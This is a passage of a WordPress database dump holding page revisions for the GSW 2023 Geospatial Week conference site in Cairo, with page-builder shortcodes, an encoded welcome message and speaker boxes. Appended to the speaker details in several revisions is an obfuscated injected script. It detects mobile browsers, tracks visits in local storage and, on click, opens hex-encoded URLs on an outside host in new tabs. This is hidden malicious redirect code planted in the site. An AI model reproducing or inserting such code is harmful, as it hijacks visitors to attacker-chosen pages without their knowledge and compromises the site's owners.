_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 22:04:39','2022-11-09 22:04:39','',3233,'https://gsw2023.com/?p=3258',0,'revision','',0),
(3259,1,'2022-11-09 22:06:32','2022-11-09 22:06:32','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text]\n\n[video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video]\n\n[/vc_column_text][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 22:06:32','2022-11-09 22:06:32','',3233,'https://gsw2023.com/?p=3259',0,'revision','',0),
(3260,1,'2022-11-09 22:08:31','2022-11-09 22:08:31','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_column_text][video width=\"960\" height=\"540\" mp4=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\"][/video][/vc_column_text][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYX